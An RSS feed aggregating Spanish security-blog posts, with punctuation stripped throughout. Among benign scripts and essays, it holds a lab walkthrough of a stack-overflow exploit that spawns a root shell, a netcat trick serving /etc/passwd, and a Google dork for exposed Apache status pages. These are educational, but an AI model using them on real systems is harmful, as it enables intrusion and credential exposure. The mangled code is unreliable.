<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Observatoire de la securite Internet</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
 <item><title>tonel - basic stats checks for stunnel</title><description>2013-02-23 12:16:27 -  Unix   Cisco   Hacks  :     bin bash die    echo   exit   LOG_FILE var log stunnellog  ROOT_UID 0 VERBOSE 0 TODAY date  pourcentsu  if    TODAY    1   then   Today is Monday BEGIN_DATE date -dmonday-7days  pourcentsYpourcentsmpourcentsd  END_DATE date -dmonday  pourcentsYpourcentsmpourcentsd  WRITE_END_DATE date -dmonday-1day  pourcentsYpourcentsmpourcentsd    dirty hack else BEGIN_DATE date -dlast-monday-7days  pourcentsYpourcentsmpourcentsd  END_DATE date -dlast-monday  pourcentsYpourcentsmpourcentsd  WRITE_END_DATE date -dlast-monday-1day  pourcentsYpourcentsmpourcentsd    dirty hack fi   Run as root, of course    UID  -eq  ROOT_UID     die  Bad luck, only root can run this code  echo -e  nTonel v04c  echo  Basic stats checks for stunnel  echo  4-II-2013, vlan7    Parse arguments while getopts  vhHfd  opt  do case  opt in v  echo -e  n  -v detected Ok, let's verbose  VERBOSE 1   h  echo -e  n-v verbose output  echo -e  n-f  specify your stunnel logfile DEFAULT LOG_FILE  echo -e  n-d   Up to 9999 days   DEFAULT one week ago from last monday  echo -e  n-h Welcome to help  echo -e  n-H Help  Long description  exit   H  echo -e  nEl script acepta varios switches Esto es la ayuda larga La ayuda corta es -h  echo -e  nEsta desarrollado de tal forma que sin ningun parametro, calcula estadisticas de la toda la semana anterior a la que nos encontramos Es totalmente transparente al dia actual, sea lunes, jueves, domingo o cualquier dia  echo -e  nEs decir, si estamos en cualquier dia de la semana del 10 al 16-2-2013, asi calcula estadisticas del 28-1-2013 al 3-2-2013, ambos inclusive  echo -e  n tbash tonel4csh  echo -e  nSi necesitamos especificar rangos seria  echo -e  n tbash tonel4csh -d 20130114 15  echo -e  nAsi calcularia desde 20130114 hasta 20130129, ambos inclusive  echo -e  nSi deseamos especificar el archivo de log de stunnel  por defecto  var log stunnellog , el script permite que le pasemos el switch -f seguido del archivo de log deseado  echo -e  nSi deseamos mas nivel de Verbose, podemos pasar al script el parametro -v  exit   f  echo -e  n  -f detected so logfile is now  OPTARG  LOG_FILE OPTARG     d  DATE OPTARG 0 8  DAYS OPTARG 9 4  INC_OR_DEC OPTARG 8 1    Basic parse of -d argument   Valid basic  DATE regexp     DATE    1-9 0-9 0-9 0-9 0 1-9 1 012 0 1-9 12 0-9 3 01     die  ERROR   DATE date detected Must be YYYMMDD format  Exiting now     INC_OR_DEC Only   implemented    INC_OR_DEC         die  ERROR   INC_OR_DEC inc_char detected Must be   BEGIN_DATE date -d  DATE  pourcentsYpourcentsmpourcentsd  END_DATE date -d  DATE INC_OR_DEC   DAYS   1  days   pourcentsYpourcentsmpourcentsd  WRITE_END_DATE date -d  DATE INC_OR_DEC DAYS days   pourcentsYpourcentsmpourcentsd     dirty hack   DEBUG line-        echo  DATE DATE INC_ORD_DEC INC_OR_DEC DAYS DAYS BEGIN_DATE BEGIN_DATE END_DATE END_DATE WRITE_END_DATE WRITE_END_DATE  echo -e  n  -d detected so date range is now n t from  BEGIN_DATE to  WRITE_END_DATE    esac done echo -e  n t t t    Now running some basic checks  echo -e  t t t  echo -e  n  Checking runnin' stunnel processes  ps -ef grep  s tunnel  die  ERROR  stunnel is NOT running  Exiting now  echo -e  n t OK  Let's continue  echo -e  n  Checking stunnel LISTEN sockets   netstat -tnl grep LISTEN egrep ' 110 143 993 995' netstat -tnl grep LISTEN grep  110  die  ERROR  POP3 is NOT listening  Exiting now  netstat -tnl grep LISTEN grep  143  die  ERROR  IMAP is NOT listening  Exiting now  netstat -tnl grep LISTEN grep  995  die  ERROR  POP3S is NOT listening  Exiting now  netstat -tnl grep LISTEN grep  993  die  ERROR  IMAPS is NOT listening  Exiting now  echo -e  n t OK  Let's continue  echo -e  n t t t    Now parsing logfile  LOG_FILE    echo -e  t t t    -f  LOG_FILE     die  Fatal ERROR  log  LOG_FILE NOT found Exiting now  echo -e  n  stunnel outtages  from  BEGIN_DATE to  WRITE_END_DATE   awk ' ' END_DATE' i 0   ' BEGIN_DATE' i 1  i'  LOG_FILE grep -c stunnel     VERBOSE -eq 0    awk ' ' END_DATE' i 0   ' BEGIN_DATE' i 1  i'  LOG_FILE grep stunnel cut -d    -f1-7 core    echo -e  n  Numero conexiones  1 OK   IP origen   from  BEGIN_DATE to  WRITE_END_DATE  awk ' ' END_DATE' i 0   ' BEGIN_DATE' i 1  i'  LOG_FILE grep  1 connected from  cut -d    -f7 cut -d  -f1 sort uniq -c sort -rn sed -e 's   ' awk ' print NR,  0 ' tr ' '  t echo -e  n t  Total conexiones   awk ' ' END_DATE' i 0   ' BEGIN_DATE' i 1  i'  LOG_FILE grep -c  1 connected from     VERBOSE -eq 0    echo -e  t  Primera conexion n t t awk ' ' END_DATE' i 0   ' BEGIN_DATE' i 1  i'  LOG_FILE grep  1 connected from  head -n 1 cut -d    -f1,2,4-7  echo -e  t  Ultima conexion n t t awk ' ' END_DATE' i 0   ' BEGIN_DATE' i 1  i'  LOG_FILE grep  1 connected from  tail -n 1 cut -d    -f1,2,4-7    core  POP3  core  POP3S  core  IMAP  core  IMAPS  echo -e  n t t t    Now checking bad guys  echo -e  t t t  echo -e  n  Numero intentos conexion rechazados   IP origen  from  BEGIN_DATE to  WRITE_END_DATE  awk ' ' END_DATE' i 0   ' BEGIN_DATE' i 1  i'  LOG_FILE grep REFUSED cut -d    -f6 cut -d  -f1 sort uniq -c sort -rn sed -e 's   ' awk ' print NR,  0 ' tr ' '  t echo -e  n t  Total rechazados   awk ' ' END_DATE' i 0   ' BEGIN_DATE' i 1  i'  LOG_FILE grep -c REFUSED n  echo -e  nLast run on  hostname  at  date  Now exiting - Have a nice day n     VERBOSE -eq 0     echo  Do you wanna verbose output  just rerun me with -v switch  exit  IMAGE  </description><link>http://www.secuobs.com/revue/news/429552.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/429552.shtml</guid></item>
<item><title>Publicada lista de ponentes RootedCON 2013</title><description>Secuobs.com : 2013-02-05 00:58:06 -  Unix   Cisco   Hacks  - Sábado 9 de marzo 16 30 - 17 00 Albert López  Linux Heap Exploiting Revisited  et al IMAGE  </description><link>http://www.secuobs.com/revue/news/425762.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/425762.shtml</guid></item>
<item><title>Ventanas con Grupo de delitos telemáticos de la Guardia Civil</title><description>Secuobs.com : 2013-01-26 17:36:54 -  Unix   Cisco   Hacks  - Entrevista en la radio al GDT muy decente para conocerlos un poco mejor IMAGE  </description><link>http://www.secuobs.com/revue/news/424054.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/424054.shtml</guid></item>
<item><title>NX ASLR Linux x64 Bypass</title><description>Secuobs.com : 2013-01-22 02:11:26 -  Unix   Cisco   Hacks  - Hola Exploiters, Acabo de leer esta excelente entrada sobre ROP y me anime a simplificarla quitandole lo mas divertido que es el ROP Simplemente para tener presentes conceptos que quizas se pasan por alto como que NX no afecta si queremos desviar el flujo del programa hacia por ejemplo una funcion perteneciente al programa a explotar  aunque el propio programa no la llame nunca  Es una explotacion en un sistema Linux de 64 bits con kernel reciente blablabla y como veis existen condiciones en las que ASLR no afecta para nada  no infoleaks needed, no bruteforce needed como si no existiera  A disfrutar root bt  uname -a Linux bt 326  1 SMP Fri Feb 17 10 34 20 EST 2012 x86_64 GNU Linux root bt  cat  etc issue BackTrack 5 R3 - 64 Bit  n  l root bt  getconf LONG_BIT 64 root bt  cat  proc sys kernel randomize_va_space  2 root bt  bash checksecsh --file vuln RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   vuln root bt  cat vulnc  include   include   include    gcc -o vuln vulnc fno-stack-protector -mpreferred-stack-boundary 4   4 is min on x64 void nunca_se_ejecuta    NUNCA SE LLAMA ESTA FUNCION EN EL CODIGO     system bin sh  printf The Segmentation fault is what we wanted to see and we dont care    so you may play a ret2libc with a chain to an exit call     void vuln char  buff    char tmp 8     ' 0'  strcpy tmp, buff  printf - pourcentssn , tmp    int main int argc, char  argv    if argc   2    printf pourcentss n , argv 0  exit 0    printf exploit me if you can  vuln argv 1  return 0    oot bt  gcc -o vuln vulnc -fno-stack-protector -mpreferred-stack-boundary 4 root bt  gdb -q vuln Reading symbols from  root vuln no debugging symbols found done  gdb  r  perl -e 'print  123456789012345678901234AAAA '  Starting program   root vuln  perl -e 'print  123456789012345678901234AAAA '  Program received signal SIGSEGV, Segmentation fault 0x0000000041414141 in      gdb  disas nunca_se_ejecuta Dump of assembler code for function nunca_se_ejecuta  0x0000000000400604   push   pourcentsrbp 0x0000000000400605   mov    pourcentsrsp,pourcentsrbp 0x0000000000400608   mov     0x4007c0,pourcentsedi 0x000000000040060d   callq  0x4004f8  0x0000000000400612   mov     0x4007c8,pourcentseax 0x0000000000400617   mov    pourcentsrax,pourcentsrdi 0x000000000040061a   mov     0x0,pourcentseax 0x000000000040061f   callq  0x4004c8  0x0000000000400624   leaveq  0x0000000000400625   retq    End of assembler dump  gdb  r  perl -e 'print  123456789012345678901234 x04 x06 x40 x00 '  The program being debugged has been started already Start it from the beginning   y or n  y Starting program   root vuln  perl -e 'print  123456789012345678901234 x04 x06 x40 x00 '  sh-41  whoami root sh-41  exit Program received signal SIGSEGV, Segmentation fault 0x00007fffffffe4a8 in      gdb  q A debugging session is active Inferior 1  process 20741  will be killed Quit anyway   y or n  y root bt  Have fun, IMAGE  </description><link>http://www.secuobs.com/revue/news/423032.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/423032.shtml</guid></item>
<item><title>Mensaje de Hugo Castellano en RootedCON 2012</title><description>Secuobs.com : 2013-01-06 12:09:04 -  Unix   Cisco   Hacks  - Sabias palabras de un carismatico que ya no esta con nosotros  IMAGE  </description><link>http://www.secuobs.com/revue/news/420104.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/420104.shtml</guid></item>
<item><title>blog2pdf  re-uploaded </title><description>Secuobs.com : 2012-12-26 19:22:54 -  Unix   Cisco   Hacks  - Herramientas  una conexion a internet, firebug y Eskorbuto - Cosas de la vida Empezo siendo gratuito obtener el PDF, despues lo hicieron de pago, y en su momento aun se podia encontrar el PDF completo en un solo archivo en la cache del navegador Bien, acabo de probarlo de nuevo  julio-2010 , y ahora guarda en la cache un PDF por pagina, y con nombres aleatorios, asi que no podemos tirar de herramientas como el bello pdftk para unir las paginas Asi que, antes de hacer trampas, he probado otras alternativas como rss2pdf, aunque con esta ultima no he conseguido imprimir las imagenes, ni siquiera jugando con firebug para alterar las opciones validadas en el lado del cliente Bueno, a base de probar cosas he conseguido bajar el pdf registrandome, guardando el pdf con las imagenes por defecto de portada y contraportada, logeandome, cambiando las imagenes y   no temo a tu padre aunque tenga escopeta    IMAGE  </description><link>http://www.secuobs.com/revue/news/418738.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/418738.shtml</guid></item>
<item><title> como puedo hacer que la victima ejecute netcat sin engañarle para que lo haga de forma manual </title><description>Secuobs.com : 2012-12-15 19:35:00 -  Unix   Cisco   Hacks  -  Evolution is a process too slow to save my soul  Germs, manimal Existe una curiosa paradoja en el mundo de la seguridad, y es que el acceso a la informacion esta superado  la tarifa plana dejo de ser una utopia despues de Infovia  a la vez que los chavales que empiezan en esto hoy lo tienen mas complicado que nosotros en los 90 Apuntarse a una carrera  maraton mas bien  que hace ya decadas que empezo debe ser muy confuso Miralo de esta forma  en los 90 lo mas preguntado por los kiddies era jack-hotmail Hoy la pregunta mas comun parece haber evolucionado al titulo de esta entrada La respuesta magica es  ejecucion remota de codigo, pero  como empezar en virus, ingenieria inversa, exploits hoy  Estos campos avanzan muy rapido, asi que estoy convencido de que alguien que simplemente haya programado demos o juegos en ensamblador en los 90, tiene gran parte del camino recorrido, al menos para adaptarse a lo nuevo Asi que seamos amables con los nuevos script-kiddies Al final un porcentaje de chavales que andan mas perdidos que un pinguino en la puerta de un garaje acabara siendo un figura y sorprendiendose ellos mismos mirando a las tonterias que habian hecho años atras Asi es la vida, asi que solo espero que no cometan demasiadas tonterias como para meterse en lios serios A nivel tecnico da igual, que eso se adquiere y al final la red esta ahi, asi que lo importante acaba siendo saber buscarse la vida La esencia de las cosas no ha avanzado nada La suite dsniff que hace 10 años que no se actualiza sigue siendo la esencia de los ataques de apoofing en una LAN La tecnica mas simple para hacer IP-spoofing tras 15 años sigue siendo combinar un ARP-spoof bidireccional con una linea SNAT de iptables sin necesidad de ataques ciegos de calcular numeros de secuencia  algo totalmente inviable en la practica  Saltarse firewalls con metodos CONNECT abriendo un tunel SSL apuntando proxytunnel contra un apache en tu casa en esencia es lo mismo que el viejo connectc del chino aquel que no se actualiza desde hace 10 años etc etc Lo viejo esta ahi, solo espera ser reutilizado, quien sepa apreciarlo que lo aprecie, la red esta ahi Si cada uno de nosotros nos miramos a nosotros mismos desde que somos niños hasta hoy, parece claro que evolucionar es aprender a-saber-estar en la vida, normalmente a base de tropezones Quien no ha cometido estupideces no tuvo infancia y quien no se rie de sus tonterias al pasar los años no ha envejecido bien Es decir que el error es inherente al ser humano, lo importante es no sobrepasar la cuota diaria Have a nice weekend   IMAGE  Segunda edicion de la Undercon, 1998  IMAGE  </description><link>http://www.secuobs.com/revue/news/417232.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/417232.shtml</guid></item>
<item><title>have a nice sunday</title><description>Secuobs.com : 2012-11-25 13:08:36 -  Unix   Cisco   Hacks  -  IMAGE   Los ardides que se emplean por tener razón son innumerables y variados, en muchos casos tan regularmente repetitivos que se convirtieron para mí en tema personal de reflexión que se orientó en su aspecto formal al ver que, por muy distintos que fueran los temas de discusión o las personas, las mismas manipulaciones, los mismos ardides se repetían y podían claramente identificarse  Schopenhauer, El arte de tener razón  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/413256.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/413256.shtml</guid></item>
<item><title>Capture the flag 2013</title><description>Secuobs.com : 2012-11-25 13:08:36 -  Unix   Cisco   Hacks  -  IMAGE    Every Fortress  Base Camp  has to run all major internet services such as SMTP, POP, IMAP, FTP, etc We will make a list of minimum required services   Your Fortress must have at least one CMS  content management system    specific plugins  Photo albums, SM share  social media share  embedded video plugin and so on We will also provide a list   Your Fortress must have at least two different internet browsers     Your Fortress must contain at least 3 web applications   Your Fortress must run at least 2 different databases  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/413255.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/413255.shtml</guid></item>
<item><title>Illiterate Ethiopian kids hack OLPCs in 5 months with zero instruction</title><description>Secuobs.com : 2012-11-07 00:40:32 -  Unix   Cisco   Hacks  -   Here's how it went down, as related by OLPC founder Nicholas Negroponte at MIT Technology Review's EmTech conference last week   We left the boxes in the village Closed Taped shut No instruction, no human being I thought, the kids will play with the boxes  Within four minutes, one kid not only opened the box, but found the on off switch He'd never seen an on off switch He powered it up Within five days, they were using 47 apps per child per day Within two weeks, they were singing ABC songs  in English  in the village And within five months, they had hacked Android Some idiot in our organization or in the Media Lab had disabled the camera  And they figured out it had a camera, and they hacked Android  http dvicecom archives 2012 10 ethiopian-kidsphp http cscottnet Publications OLPC idc2012pdf  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/409977.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/409977.shtml</guid></item>
<item><title>windows codepage 65001 is a pain</title><description>Secuobs.com : 2012-10-31 21:54:08 -  Unix   Cisco   Hacks  - so encode utf-8 to unicode as soon as possible  tildes eñes etc no se imprimen bien Existe un bug en python con la codificacion 65001 de Windows que se arrastra hasta la version 3 de la piton Bugs como bugspythonorg issue1602 continuan abiertos Yo me las apañe asi  Como ejemplo para gam  aunque es aplicable a cualquier cosa que maneje por ejemplo utf-8  lo que hice fue definir la siguiente función al principio del codigo  def to_unicode_or_die  obj, encoding 'utf-8'  if isinstance obj, basestring  if not isinstance obj, unicode  obj   unicode obj, encoding  return obj Y llamarla por ejemplo en la parte del codigo que imprimia por pantalla Cambiando  print '  '   group 'groupName'    '   '   directIndirect   ' member ' por  print '  '   to_unicode_or_die group 'groupName'    '   '   directIndirect   ' member ' Y asi funciona partiendo de cualquier codepage activo en el cmd powershell lo_que_sea La funcion urllib2 en Linux OSX bajando una pagina con codificacion utf-8 en la cabecera Content-Type lo manejan bien de serie, pero si no podemos dedicar un  nix, en windows lo mejor que se me ocurrio para solucionarlo fue convertir a Unicode ASAP Happy coding   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/408899.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/408899.shtml</guid></item>
<item><title>Happy Halloween</title><description>Secuobs.com : 2012-10-31 20:16:57 -  Unix   Cisco   Hacks  - Para fisgones muy aburridos http wwwgooglecom search q pourcents22Apache Server Status forpourcents22 server-status is only Information disclosure which includes information such as Server uptime, Individual request-response statistics and CPU usage of the working processes, Current HTTP requests, client IP addresses, requested paths, processed virtual hosts on some popular site like cisco, nbacom, Cloudflare, Metacafe, apacheorg , Ford and others  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/408859.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/408859.shtml</guid></item>
<item><title>Averigua en que segmento coloca el SO las variables</title><description>Secuobs.com : 2012-09-21 22:04:26 -  Unix   Cisco   Hacks  - Hola, Este codigo me parecio util para averiguar en que segmento de memoria coloca el SO las variables de un codigo C segun sean globales, locales, etc El codigo tambien muestra el valor de cada variable y su direccion de memoria en esa ejecución Y alguna cosa mas El resultado es que las variables definidas como static en el codigo se colocan siempre en la misma posicion de memoria Lo mismo para las globales Tengo en mi sistema  proc sys kernel randomize_va_space   2 Es decir, en una compilacion estandar con gcc 443 gcc codec -o code ASLR no ha aleatorizado las posiciones de memoria de las variables globales Las static tambien residen siempre en la misma posicion de memoria La version de glibc es la 2111 y el codigo esta disponible en forooverflowedmindsnet viewtopicphp f 29 t 74 Si alguien conoce el autor que escriba Have fun,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/401140.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/401140.shtml</guid></item>
<item><title>Juegos de guerra</title><description>Secuobs.com : 2012-08-19 01:04:47 -  Unix   Cisco   Hacks  - Ya tenemos sesion de buen cine para esta noche http wwwyoutubecom watch v E9xKZFGQlnA Login  Joshua  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/394459.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/394459.shtml</guid></item>
<item><title>Software Exploitation</title><description>Secuobs.com : 2012-08-01 20:16:07 -  Unix   Cisco   Hacks  - Guia desarrollada por Borja Merino para el Inteco-CERT y descargable desde http certintecoes extfrontinteco img File intecocert EstudiosInformes cert_inf_software_exploitationpdf 103 paginas en PDF  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/391139.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/391139.shtml</guid></item>
<item><title>fork exec wait </title><description>Secuobs.com : 2012-07-28 02:33:57 -  Unix   Cisco   Hacks  - Hola, Aqui una entrada quizas curiosa En un terminal        nc -v -l  etc passwd         kill -9   Hemos puesto a netcat a la escucha sirviendo el archivo de contraseñas Con un doble fork -good old fork- logramos que siga ejecutandose aun despues de haber cerrado el terminal, que como somos asi de chulos lo cerramos cargandonos si o si la shell actual     bash PID  Una vez se nos ha cerrado el terminal abrimos otro y vemos en que puerto continua a la escucha netcat Nos conectamos y ahi tenemos el archivo servido   lsof -i grep  nc nc         3162     root    3u  IPv4 1052823      0t0  TCP  58157  LISTEN    nc 127001 58157 root x 0 0 root root bin bash daemon x 1 1 daemon usr sbin bin sh bin x 2 2 bin bin bin sh sys x 3 3 sys dev bin sh sync x 4 65534 sync bin bin sync games x 5 60 games usr games bin sh man x 6 12 man var cache man bin sh lp x 7 7 lp var spool lpd bin sh mail x 8 8 mail var mail bin sh news x 9 9 news var spool news bin sh uucp x 10 10 uucp var spool uucp bin sh proxy x 13 13 proxy bin bin sh www-data x 33 33 www-data var www bin sh backup x 34 34 backup var backups bin sh list x 38 38 Mailing List Manager var list bin sh irc x 39 39 ircd var run ircd bin sh gnats x 41 41 Gnats Bug-Reporting System  admin var lib gnats bin sh libuuid x 100 101 var lib libuuid bin sh syslog x 101 103 home syslog bin false sshd x 102 65534 var run sshd usr sbin nologin landscape x 103 108 var lib landscape bin false messagebus x 104 112 var run dbus bin false nobody x 65534 65534 nobody nonexistent bin sh mysql x 105 113 var lib mysql bin false avahi x 106 114 var run avahi-daemon bin false snort x 107 115 Snort IDS var log snort bin false statd x 108 65534 var lib nfs bin false usbmux x 109 46 home usbmux bin false pulse x 110 116 var run pulse bin false rtkit x 111 117 proc bin false festival x 112 29 home festival bin false postgres x 1000 1000 home postgres bin sh  C   Por cierto, al salir de la shell asi kill -9    se guarda el historial de comandos  Ademas, al menos en bash    comando  comando se guarda en el historial   comando  comando no aparece al hacer un history  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/390372.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/390372.shtml</guid></item>
<item><title>Los hackers son malos o todo lo contrario</title><description>Secuobs.com : 2012-07-09 10:39:37 -  Unix   Cisco   Hacks  - Acabo de leer un articulo de Chema Alonso y como me parece muy positivo, cut paste incoming  Hace unos meses, me pidieron un artículo para la revista número 16 de CXO Comunity, un magazine que es leído por profesionales de la seguridad, y especialmente CTO y CSO Aprovechando que en toda Latino-América el término hacker está mucho más denostado que en España, decidí escribir un artículo para ver si conseguía hacerles ver positivo tener hackers en las empresas, que tras el debate en la Ekoparty de Hackers vs CSO, creo que necesitamos ese entendimiento Espero que os guste Los Hackers son malos o todo lo contrario Se ha instaurado una sensación de que un hacker es alguien malo de quién hay que protegerse en las empresas, cuando lo que tienes que hacer es tener hackers en tu empresa para ayudarte Un hacker no tiene porque ser malo para tu compañía No es que quiera entrar en el eterno debate del término hacker, que ha llevado a acaloradas discusiones y diatribas en torno a las connotaciones positivas o negativas que se ha ido asociando a él No voy a entrar en usar alguna de las míticas y coloridas definiciones del término, que cual pintura modernista admite todas las variaciones de la refracción de la luz, o de las definiciones anglosajonas usando crack, crash o hack como raíz de la palabra En este entorno quiero utilizar el adjetivo calificativo como una categoría profesional De profesión  Hacker Asumamos que un hacker es alguien capaz de llegar más allá de lo que dicen las especificaciones, consiguiendo hacer cosas que van desde lo curioso a lo maravilloso pasando por lo menos esperado Así, un hacker puede montar una computadora en un drone para robar los datos de los usuarios de redes WiFi a 100 metros de altura, o modificar el tan nombrado asistente personal Siri que viene en los iPhone 4S de la compañía de la manzana del pecado para que pueda ser controlado por la mente, como hace el proyecto Black Mirror, o encontrar un fallo en el sistema criptográfico de un algoritmo para poder descifrar la información oculta en cuestión de unos minutos Todos ellos son hackers Son gente con capacidades especiales, adquiridas en base a mil horas dedicadas por culpa de una pasión infinita, o por un ansia enfermizo que les impide dormir sin responder a la preguntas que le atormentan   Por qué   Cómo   Y si  A lo largo de mi vida profesional, he tenido la suerte de viajar por muchos rincones del mundo, y conocer a hackers increíbles, de ver conferencias únicas y demostraciones técnicas que te roban el aliento así como de compartir una cerveza con muchos de ellos César Cerrado, Hernán Ochoa, Charlie Miller, Moxie Marlinspike, Dan Kaminsky, Rubén Santarmarta, Bernardo Quintero, Mikel Gastesi, David Litchfield, Alex Sotirov, los míticos Sexy Pandas o los Int3Pids son algunos ejemplos de diferentes tipos de hackers, focalizados en distintas disciplinas Hackers, que trabajan en empresas haciendo labores profesionales en el mundo de la seguridad Algunos son lo que, de broma, con sorna, y un poco de mala leche, se llaman  Security Pr0n Stars  o starletes del escenario y la CON, pero no todos son así Muchos realizan una labor más encubierta, o menos extrovertida, pero aún así tienen lo que el gran Jhonny Long denominaba  La mirada hacker  Algo que los hace distintos a los demás Ni mejores, ni peores Simplemente distintos A veces, se habla de los hackers como si fueran delincuentes o como si fueran el auténtico enemigo de las organizaciones Se venden soluciones de protección contra hackers, se hacen planes de defensa contra hackers, se instalan sistemas de intrusión contra hackers Y es que un hacker podría tener tal vez la capacidad de hacer todo eso que te preocupa Ya he dicho que son diferentes Tal vez un hacker no entienda cómo funciona el negocio de una empresa, o que no conozcan los problemas de gestión presupuestaria de una organización Tal vez incluso no sepan montar un sistema de gestión de usuarios, o configurar un servidor de bases de datos para dar soporte a una aplicación Pero eso no les hace menos importantes en el mundo empresarial, y tampoco tienen por que ser el enemigo Un hacker es alguien con una capacidad distinta, pero esa capacidad no le hace ni bueno ni malo, ni enemigo ni aliado, ni Dios ni el Demonio  Alguien te garantiza que un Administrador de Sistemas no sea tu peor enemigo dentro de tu empresa  No creo que para alguien acostumbrado a trabajar con equipos de personas sea ajeno el concepto de que  no todos son iguales  Así, los equipos de Recursos Humanos en las empresas tratan por todos los medios de resolver la incógnita de la personalidad de los profesionales en el proceso de selección, evitando por todos los medios contratar  problemas  Sin embargo, en muchas empresas o en la mente de muchos responsables de sistemas se ha instaurado la latente sensación de que un hacker en una empresa son problemas Y eso es un error Sí, es cierto, alguien malo con habilidades hacker puede ser peligroso dentro de una compañía, pero  no lo es un administrador de correo maligno  Imagina por un momento que la persona encargada de los backups del correo electrónico se lleva los ficheros a su casa, y allí dedica sus solitarias y torturadas noches en la búsqueda del cotilleo, el dato sensible, o la información escabrosa que haya podido fluctuar por el sistema  no te da miedo pensar que tu administrador de correo se haya leído todos tus mensajes  Si lo piensas detenidamente, la cantidad de personas técnicas a las que te ves abocado a confiar es tan alta, que si empiezas a desconfiar de todas ellas acabarás viviendo en la paranoia Lo siento Es así Ahora piensa en positivo, y supón que esas habilidades hacker están al servicio de tu empresa  Cuantas páginas web han sido vulneradas por fallos sencillos que podría haber detectado cualquier hacker que hubiera echado algo de tiempo en mirar la seguridad   Cuántos problemas intentos se podrían haber evitado si un hacker te hubiera alertado internamente de que hay una herramienta que permite acceder a los datos de la WiFi que usa el director general   Cuanto dinero se hubiera ahorrado una compañía si hubiera cerrado los fallos de seguridad que han llevado al robo de datos, la consiguiente multa del gobierno y descrédito en la opinión pública en muchas empresas  Tal vez el hacer una auditoría de seguridad periódica a los servicios externos de una empresa ya está algo más instaurado en las grandes empresas Así, de la partida presupuestaria se reserva  algo  de dinero para hacer auditorías Normalmente esa cantidad de dinero siempre es discutida, y no consigue ser lo necesaria para garantizar que una empresa externa te revise la seguridad de forma continuada, sino solo durante un instante de tiempo Algo que todos sabemos que tiene una utilidad temporal, ya que la seguridad de una plataforma es cambiante en función del tiempo Sí, hacer una auditoría, contratando empresas como la nuestra para hacerte una auditoría de hacking ético, un pentesting de aplicaciones web, o una auditoría externa es fundamental por muchas razones  - Para saber qué nivel de seguridad tienes y poder informar en el comité de una situación de riesgo o de la necesidad de invertir más en la protección de la continuidad del negocio - Para ofrecerte otra visión distinta de la seguridad, ya que con el paso del tiempo los equipos de auditoría interna y los desarrolladores de tecnología se adaptan los unos a los otros, haciendo que se convierta en un juego ante el espejo - O para estar más tranquilo y confirmar que estás haciendo las cosas bien Es fundamental contar con gente fuera que te ayude Profesionales del hacking ético Hackers que son profesionales en su misión Que tienen una visón distinta de la tecnología Que ven distintas las cosas Que son diferentes Que te pueden ayudar en tu misión de tener una plataforma mucho más segura No confundas a un hacker con un delincuente, ni a un delincuente con un hacker No hay una ley escrita o no escrita que deba ser firmada para que alguien sea o no un hacker No hay que hackear la Nasa y poner  hax0r estuvo aquí , ni es necesario robar las fotos del correo de una actriz famosa para ser alabado o reconocido por un ente abstracto, y algunas veces mal enfocado como  yo y mis amigos , llamado Comunidad Hacker Olvidate, yo trabajo con hackers, y son gente genial, capaz de resolver problemas o detectarlos en tiempos récord Pueden encontrar un fallo en la programación de una aplicación usando técnicas que aún no son conocidas, o pueden ver un problema en un sistema solo entornando un poco los ojos para mirar en su cerebro la estructura del sistema y sus debilidades Eso es fundamental en tu organización Igual que hay ejecutivos capaces de leer el mercado y tomar la mejor decisión en el mejor momento, de cambiar el nombre de un producto para mejorar el marketing, comerciales capaces de transmitir la necesidad a los clientes más duros, o economistas y contadores hábiles que ahorran dinero o generan beneficios con movimientos de dinero en sus libros de cuentas Así son los hackers pero con la tecnología Las grandes empresas ya cuentan con sus equipos de hacking ético internos, su grupos de seguridad formado por hackers que se encargan de detectar los fallos, de hacer los procesos más seguros, o de desarrollar tecnología a medida para mejorar el rendimiento de los recursos Esos equipos cuentan con hackers que son profesionales de la seguridad, personas brillantes que trabajan para compañías para las que resultan extremadamente rentables Hackers en la Gran Empresa El número de hackers que engrosan las filas de las grandes empresas es infinito Muchos de ellos tienen historias menos conocidas, pero hay otros casos que han dado la vuelta al mundo por la fama de ellos mismos Como muestra de casos famos de contratación de hackers por grandes empresas tenemos los recientes casos de GeoHot, el hacker que rompió la seguridad de PlayStation 3 de Sony, y que tras sufrir un proceso judicial con Sony, acabó siendo fichado por la multinacional Facebook Moxie Marlinspike, el famoso hacker por ataques como el de Null-byte en la petición de certificados digitales que le permitía conseguir certificados falsos perfectos para sitios como Gmail o Live, y por sus herramientas como SSLSniff y SSLStrip usadas en ataques de man in the middle, acaba de entrar a formar parte de Twitter tras la adquisición de su empresa por la red social de los 140 caracteres Y por último, el sorprendente caso de Comex que durante los últimos años se ha dedicado a investigar formas de romper los sistemas de seguridad de Apple en iPhone o iPad para crear JailbreakMe, una 